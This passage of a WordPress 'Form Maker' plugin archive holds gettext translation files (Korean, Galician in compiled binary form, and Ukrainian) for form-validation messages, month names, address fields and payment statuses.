#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "죄송합니다, 당신은이 파일 형식을 업로드할 수 없습니다."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "오류는 파일은 이동할 수 없습니다."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr "이 필드 %s 고유 항목을 필요하며이 값은 이미 제출되었습니다."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "오류, 이메일이 전송되지 않았습니다."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "아무것도 제출되지 않았습니다."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "양식이 성공적으로 제출되었습니다."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "오류, 이메일이 전송되지 않았습니다."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "귀하의 이메일 주소는 이미 검증된다."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "이메일이 성공적으로 확인되었습니다."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "이메일 확인 시간이 초과되었습니다."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "확인 링크가 잘못되었습니다."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "필드가 필요합니다."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "이것은 유효한 이메일 주소가 아닙니다."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"당신은 이전 날짜를 선택할 수 없습니다. 현재 하나에서 시작하는 날짜를 선택합"
"니다."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "The"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "값 사이에 있어야합니다 "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "수량"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "당신의 점수는보다 작아야합니다 "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "제목"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "첫 번째"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "마지막"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "중간"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "지역 코드"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "전화 번호"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "달러"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "센트"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "에서"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "에"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "이동 "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "재설정 "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "필드를 선택 "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "날짜 선택"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-gl_ES.mo000060400000007375152434416630012200 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
G
X
_
e
l

t
	
"�
(�
#�
�
#)=ELQW
lw~�
����
�>�1NSl'oI�7�
!
)&
HP
-�
4�
(�
)%YO'���4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:55+0400
PO-Revision-Date: 2015-05-22 16:56+0400
Last-Translator: 
Language-Team: 
Language: gl
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
AbrilCódigo de áreaAgostoCentsCidadeCountryIntegranteDólares Erro, de correo-e non foi enviado.De erro, o ficheiro non pode ser movido.De erro, código de seguridade mal.FebreiroPrimeiraA partir deir XaneiroJulloCorreo non desexadoÚltimaBuscarLunsMedioNada foi presentado.IntegranteOutrosNúmero de teléfonoPostal / Zip CodeCantidade Restablecer Seleccione unha dataSeleccione un campo IntegranteSentímolo, non ten permiso para enviar este tipo de ficheiro.Estado / Provincia / RexiónRúaRúa Liña de enderezo 2O O arquivo excede o tamaño permitido deEste campo %s require unha entrada única e este valor xa ten presentado.Este non é un enderezo de correo electrónico válido.TítuloParaLigazón de verificación non é válido.Non podes seleccionar ex datas. Seleccione unha data a partir da actual.O seu enderezo de correo-e xa foi comprobado.O seu correo electrónico foi verificada con éxito.O seu correo-e de verificación expirou.O seu formulario foi sometido con éxito.O seu IP está na lista negra. Por favor, póñase en contacto co administrador do sitio.A súa puntuación debe ser inferior a campo é necesario.valor debe estar entre languages/form_maker-uk_UA.po000060400000060671152434416630012214 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 17:05+0400\n"
"PO-Revision-Date: 2015-05-22 17:06+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: uk\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Адреса"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Адреса рядок 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Сіті"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Штат / Область / регіон"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Поштовий / Індекс"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Країна:"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Січень"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Лютий"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Березень"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "Квітень"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Травень"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Червень"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Липень"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "Серпень"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "Вересень"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Жовтень"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "Листопад"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Грудень"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Помилка, невірний код безпеки."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr ""
"Ваш IP занесений в чорний список. Будь ласка, зверніться до адміністратора "
"сайту. "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Файл перевищує допустимий розмір"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "На жаль, ви не можете завантажити цей тип файлу."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Помилка, файл не може бути переміщений."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr "Це поле %s вимагає унікальну запис, і ця величина вже представлені."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Помилка, адреса електронної пошти не був відправлений."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Нічого не було представлено."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Ваша форма була успішно представлена."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
